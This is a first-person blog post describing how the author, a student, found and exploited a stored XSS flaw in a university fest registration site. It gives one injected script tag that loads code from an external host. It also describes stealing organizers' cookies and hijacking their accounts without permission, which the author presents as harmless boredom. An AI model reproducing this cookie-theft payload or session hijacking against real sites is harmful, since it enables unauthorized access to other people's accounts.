So this happened around 3 years ago, I study at a reputable university located in South India (I would like to keep the name of the university private in this post) and we have two fests (short for festivals) every year.
Sure, these fests are fun for extroverts, but introverts like me would rather stay in my hostel room watching movies or playing video games.
I don't remember exactly but I think it was around September 2018 and a fest was coming up!
I was in my second year of college back then, and being an introvert myself, I did not take part in any organizing team (there are different teams like development team, art team, sponsorship team, etc)
The fest is an All-India fest, meaning students from any university in India can register for events and visit them.
So, there is a website developed (I think it is developed by senior year students, but I'm not completely sure) using which anyone can browse all the events organized, dates and timings of these events, and also register for these events by paying online (or by paying with cash at the campus).
The organizers of the fest can also use this website to see the details of all the people who registered for their events, send them messages, cross-check their payments, etc., basically, they can do some administration stuff.
The website had a registration form using which one can register by submitting their Name, College registration number (or a username), phone, email, and College name.
I think I was just bored that day, and someone sent me a message with this website link asking me to register for some events (which I'm not really interested in). But I clicked on the link anyway because now I have something to pass my time.
Instead of filling the registration form with my genuine details, I put values within HTML tags to test if this form is vulnerable to XSS (Cross-Site Scripting).
When I tried to submit the form, a message popped up saying something like "Invalid Characters in the fields". I figured out that this validation is actually done by local javascript code and it is only limited to the browser.
I quickly fired up BurpSuite (a proxy tool to read and modify HTTP messages) and submitted the form again but this time I did not include any HTML tags or other weird characters. I intercepted this POST request with BurpSuite and here I modified the field values and put back the HTML tags that I was planning before.
As you could see in the image above, I intercepted the request and modified the college-register (equivalent to College Name) field to include a <script> tag.
The registration was successful!
After I login with these credentials, when I go to the 'My Profile' page, which displays all the details that I entered in the registration form (including the College Name), the script tag that I injected in the college name field got triggered I got an alert message.
This shows that the site is indeed vulnerable to XSS because no input sanitization is being done on the backend.
So now, I was thinking - when I register for some event, the organizers of that event will see my name along with my details (name, phone, email, college name)
But my college name contains a script tag, that will trigger some javascript code that I injected. This means that whoever sees my details (my college name to be precise) will have this javascript code executed on their browser. This is a Stored XSS!
So in simpler words, I can execute javascript on the browsers of the organizers using this vulnerability.
So I quickly created a new account using the registration form and this time I injected a script tag with a source (src attribute) pointing to a javascript file hosted on my webserver.
<script src="https://savedata156.000webhost.com/exploitweb.js" </script>
The reason for doing this is simple. Since I'm hosting this script file on my webserver (which is available on the Internet), I can modify it anytime I want and the XSS will work accordingly. This means that whenever I make any changes to this js file on my web server, the changes will reflect on this vulnerable site as well because I injected a script tag that gets the source from a publicly accessible URL on my webserver.
Then, I wrote some simple code in this js file that will get the cookies and the username of the current user and send them to my webserver as a GET request.
On my webserver, the received data is then added to a database. I wrote some PHP code to do this.
The next day, I logged back into my database to see if there are any entries.
And yes! There are many entries!
I downloaded the whole table as a CSV file to take a better look at it.
Each row contained the timestamp at which the details are received, the username of the account, and their cookies. I censored the usernames for obvious reasons.
So now that I have the cookies, I can simply login to these compromised accounts!
I used a Cookie Editor plugin and used these cookies to login to their respective accounts.
Now I have full access to the organizers' accounts!
With this, I was able to do a lot (like registering myself for events for free).
However, I did not do misuse it in any way because that was not my intention. I was just bored after all!
Fortunately, this bug was fixed 3-4 days later and before the actual fest started.
The fest went great, so happy ending I guess? :)